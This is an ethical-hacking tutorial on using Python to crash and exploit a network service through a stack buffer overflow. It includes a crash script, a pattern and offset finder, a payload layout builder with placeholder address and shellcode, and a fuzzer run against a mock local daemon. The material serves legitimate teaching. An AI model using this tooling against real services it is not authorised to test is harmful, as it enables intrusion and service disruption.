
How to Hack Using Python – Python for Pentesters & Hackers


In this article, we will learn how to hack using Python and how you can use Python to build hacking tools that make your work easier. With Python you can automate many of the exploits and penetration tests you have learned in our ethical hacking course, and those you will explore as you work towards becoming a first-rate ethical hacker.

If you know computers well enough to understand how programs are written and how they work, you will agree that Python is a brilliant language. You can build dynamic and very useful tools just by stringing together [mostly] English phrases that even a newbie can read. It is regarded as the lazy programmer’s language: a script of a handful of lines can do a great deal.

Python for Pentesters & Hackers

Here at Hacking Pages, we are committed to offering valuable knowledge that you will find beneficial beyond the basic satisfaction of curiosity. You have invested hours in learning the various tactics that seasoned hackers use every day, but you should know that this is just the beginning.

In the Black Hat Python book, the author Justin Seitz goes in-depth to present Python as the hacker’s programming language of choice. The most skilled hackers, whether they do it for fun, as a career, or for their own selfish purposes (read: black hat), are all programmers first. If you are not a good programmer yet, this is the perfect opportunity to become one using the easiest and most versatile language there is, and to apply it to something practical and fun, such as hacking.

You can get results without learning to write your own Python scripts, but you would essentially be a script kiddie, running other people’s tools without understanding them. No one wants to remain a script kiddie forever, but it is a good enough place to start. Learning how to hack using Python is the way out. So, here we go.

If you do not have Python installed on your computer, download and install it. Python runs on Linux, Windows and macOS, so you can write the script on your everyday machine rather than inside the VMware virtual environment you use to run Kali Linux (Kali ships with Python 3 if you prefer to work there). Keep the machine you attack inside a VM.

Download a current Python 3 release and a text editor (to write your code) before you begin. If you are completely new to Python, pause this article and learn the language basics first; the Black Hat Python book assumes you know them and is the natural next read before you proceed to the exploit.

How to Hack Using Python

If you have ever come across the term “buffer overflow,” chances are it was a reference to a vulnerability in a specific piece of software. A buffer overflow is a memory-safety bug: the program writes more data into a fixed-size buffer than the buffer can hold.

The excess spills into adjacent memory and overwrites whatever lives there. On the stack that includes the function’s saved return address, the “flow data” that tells the CPU where to continue when the function returns. Feed the program garbage and the usual result is that it dereferences a nonsense address and is killed with a Segmentation Fault.

The crash is only the symptom. If the bytes that reach the saved return address are under your control, you decide where execution continues when the function returns, and you can point it at machine code you placed in the same buffer. That is how an oversized input turns into arbitrary code running inside the target process.
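The standard way to go from “it crashed” to “I control the return address” is to send a non-repeating pattern instead of plain A’s, read the value that landed in the instruction pointer from the debugger, and look up where in the pattern those bytes sat. The following is an added example, not code from the original article: it generates a Metasploit pattern_create-style pattern, finds the offset of the value seen in EIP, and lays out the classic padding / return address / NOP sled / payload buffer. The EIP value 0x41356141, the return address 0xDEADBEEF and the four-byte `\xcc` stand-in payload are placeholders for the demonstration, not values for any real target.

```python
import string
import struct
from itertools import product


def cyclic_pattern(length):
    """Build a Metasploit pattern_create-style string: Aa0Aa1...Aa9Ab0Ab1...
    Every 4-byte window is unique within the 20,280-byte period, so a value
    found in a register maps back to exactly one offset. Returned as bytes,
    truncated to the requested length."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern repeats after 20280 bytes; use a longer alphabet")
    triplets = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        triplets.append(upper + lower + digit)
        if len(triplets) * 3 >= length:
            break
    return "".join(triplets)[:length].encode("ascii")


def pattern_offset(pattern, value):
    """Given the value that landed in the instruction pointer after the crash,
    either as raw bytes or as the little-endian 32-bit integer a debugger shows
    (e.g. EIP = 0x41356141), return the offset in the pattern where those bytes
    started, or -1 if they are not part of the pattern (the crash was not
    caused by our buffer reaching the return address)."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern.find(needle)


def build_payload(offset, ret_addr, shellcode, nop_sled=16):
    """Lay out the classic stack-smash buffer: padding up to the saved return
    address, the address to return into (little-endian, 32-bit x86), a NOP
    sled, then the code to run. ret_addr and shellcode are placeholders the
    caller supplies; nothing here is specific to a real target."""
    return (b"\x41" * offset
            + struct.pack("<I", ret_addr)
            + b"\x90" * nop_sled
            + shellcode)


if __name__ == "__main__":
    pattern = cyclic_pattern(2500)          # same size the article's script sends
    # Constructed crash report: pretend the debugger showed EIP = 0x41356141
    eip = 0x41356141
    off = pattern_offset(pattern, eip)
    print(f"saved return address is overwritten at offset {off}")
    # Placeholder address and payload: 0xDEADBEEF and four INT3 bytes
    payload = build_payload(off, 0xDEADBEEF, b"\xcc" * 4, nop_sled=8)
    print(payload.hex())
```

Replace the 2,500 A’s in the crash script with `cyclic_pattern(2500)`, crash the service once more, and feed the EIP value into `pattern_offset`; an answer of -1 means the bytes in EIP did not come from your buffer and you need a different approach (or a bigger buffer).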

Create a Remote Buffer Overflow Exploit

In this hack, you will write a Python script that sends an oversized input to a network service so that you can trigger this crash. That is the first step of any remote buffer overflow exploit: once you know the service falls over, you refine the buffer so that you control exactly what overwrites the return address and therefore what the process executes next.

Step 1: Preparation and Setup

At this point in our how to hack using Python guide, you should have learned the basics of programming in Python, especially the different data types, how to write Python scripts, save .py files, and run them. You should have Python 3 installed on your system (Linux or Windows are both fine) and network connectivity to your target machine. The script talks to the target over TCP.

First off, we need a server to test our exploit on. As with every exercise in this course, we insist that you only test this exploit on a machine you have permission to test on. Attempting to carry out hacks on strangers’ computers over the Internet is illegal and could have very serious legal repercussions. Do not try it.

Finding a target for your buffer overflow hack is the hard part. Do not go looking for live servers on the Internet: stand up a deliberately vulnerable service in your own lab (a VM on the same network as your Kali box) and attack that. The Google Hacking Database provided by the good folks at exploit-db is still a useful reference for learning what exposed, vulnerable software looks like, and exploit-db’s archive of published buffer overflow exploits names software you can install in your lab and practise against.

Step 2: Writing the Python Script

Once you have a target in your lab, the next step is much more fun: writing the code. We will first import the sys and socket libraries, then write the code that builds and sends the buffer.

Start your text editor and enter the following code:

#!/usr/bin/env python3
import sys
import socket

# Read -s <host> and -p <port> from the command line
host = None
port = None
for carg in sys.argv:
    if carg == "-s":
        argnum = sys.argv.index(carg)
        argnum += 1
        host = sys.argv[argnum]
    elif carg == "-p":
        argnum = sys.argv.index(carg)
        argnum += 1
        port = int(sys.argv[argnum])    # connect() needs an int, not a string

if host is None or port is None:
    sys.exit("usage: overflow.py -s <host> -p <port>")

buffer = b"\x41" * 2500                 # 2500 'A' bytes, far more than the service expects
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(b"USV " + buffer + b"\r\n\r\n")  # USV command with an oversized argument, CRLF-terminated
s.close()
print("Overflow buffer sent!")
What does this Python script do?
After the interpreter line, the script imports sys (for the command-line arguments) and socket (for the TCP connection). It walks sys.argv to pick up the host after -s and the port after -p, builds a buffer of 2,500 bytes of \x41 (the letter A), opens a TCP socket to the target, and sends the USV command followed by that buffer and a CRLF line ending. Python 3 sockets carry bytes, not str, which is why every piece of the message is a bytes literal. The final print only confirms that the data left your machine; whether the service actually crashed has to be checked on the target side, by watching whether it still answers or by attaching a debugger.

Step 3: Executing the Remote Buffer Overflow Exploit Script

After you have saved the script (say, as overflow.py), the next step is to execute it. Open a terminal or command prompt, change the working directory to the folder that holds the .py file, and run python3 overflow.py -s <target-ip> -p <port>. Then look at the target: if the service stops responding, or the debugger attached to it reports a crash, the oversized buffer has done its job. If any of this is unfamiliar, it is all explained in detail in the Black Hat Python book.
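In practice you rarely know the magic size up front, so the script above is normally turned into a small fuzzer that grows the buffer until the service stops answering. The following is an added example (not from the original article) that does this end to end and, so that it runs offline, pairs it with a constructed stand-in for a vulnerable daemon: a loopback TCP service that sends a banner, reads one command line, and “dies” (drops the client and stops listening) once the line exceeds CRASH_AT bytes. The fake service, its port, the USV command shape and the 1,200-byte threshold are assumptions for the demonstration; the fuzz() and send_buffer() functions work unchanged against a real target in your lab.

```python
import socket
import threading

CRASH_AT = 1200  # constructed: the fake daemon "dies" once a command line exceeds this


def recv_line(conn, limit=65536):
    """Read from conn until CRLF, EOF or limit bytes; returns what was read."""
    buf = b""
    while b"\r\n" not in buf and len(buf) < limit:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def start_fake_service():
    """Start a throwaway TCP daemon on 127.0.0.1 that stands in for a crashable
    service (constructed for this demo, not a real vulnerable program).
    Returns (port, stop_event). It answers '200 OK' to short command lines; a
    line longer than CRASH_AT makes it drop the client and stop listening,
    which is what a crashed daemon looks like from the network."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))       # port 0: let the OS pick a free port
    srv.listen(5)
    srv.settimeout(0.2)              # lets the accept loop notice stop_event
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            try:
                conn.settimeout(2.0)
                conn.sendall(b"220 fake-svc ready\r\n")
                line = recv_line(conn)
                if len(line) > CRASH_AT:
                    srv.close()      # simulate the crash: nothing listens any more,
                    return           # and the current client gets no reply
                conn.sendall(b"200 OK\r\n")
            except OSError:
                pass
            finally:
                conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop


def send_buffer(host, port, size, timeout=2.0):
    """Connect, read the banner, send 'USV ' + size x 0x41 + CRLF (the shape the
    article's script uses) and report whether the service still answered.
    False means refused, reset, timed out or closed without a reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if not s.recv(1024):                      # banner
                return False
            s.sendall(b"USV " + b"\x41" * size + b"\r\n")
            return bool(s.recv(1024))                 # b"" means the peer closed on us
    except OSError:                                   # ConnectionRefused/Reset, timeout
        return False


def fuzz(host, port, start=100, step=100, limit=3000):
    """Grow the buffer step by step until the service stops answering.
    Returns (crashing_size, confirmed); confirmed is True when a tiny follow-up
    probe also fails, which separates a dead daemon from one dropped connection."""
    size = start
    while size <= limit:
        if not send_buffer(host, port, size):
            confirmed = not send_buffer(host, port, 1)
            return size, confirmed
        size += step
    return None, False


if __name__ == "__main__":
    port, stop = start_fake_service()
    try:
        size, confirmed = fuzz("127.0.0.1", port)
        if size is None:
            print("no crash up to the size limit")
        else:
            print(f"service stopped answering at {size} bytes; confirmed dead: {confirmed}")
    finally:
        stop.set()
```

Against a real service the confirmation probe matters: a single failed send can be a dropped connection or a busy server, so re-probe before you believe a crash, and remember that you have to restart the service yourself between attempts once it really has died.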

Congratulations! You have written and executed your first Python exploit script. Treat it as a proof of concept rather than a finished exploit: it shows the service can be knocked over, and working out which bytes land in the return address and what to put there turns that crash into control. You can also use Python to automate the many exploits we have studied in this white hat ethical hacking guide, including the SQL injection hack and the Nmap hack.

Hacking with Python – Video Tutorials

Below is a list of 13 excellent video tutorials from HackerSploit that will teach you how to hack using Python. In this series you will learn how to use Python to create network tools and ethical hacking scripts, taking you from beginner to intermediate, or even advanced, Python. It is a good starting point for non-programmers.

Conclusion

Learning to code with Python is the perfect place to start your journey as an ethical hacker. You will also need other prerequisite computer skills, including an understanding of how operating systems work (most are written in C and C++, so find out what those languages do that Python hides from you, memory management above all) and how computer networking works. The topics we have covered in this article and in the white hat ethical hacking guide are proof enough that hacking is not rocket science.

I hope this article helped you to figure out how to hack using Python and how to create hacking tools that make your work as a hacker easier. Feel free to share your thoughts in the comments section below.

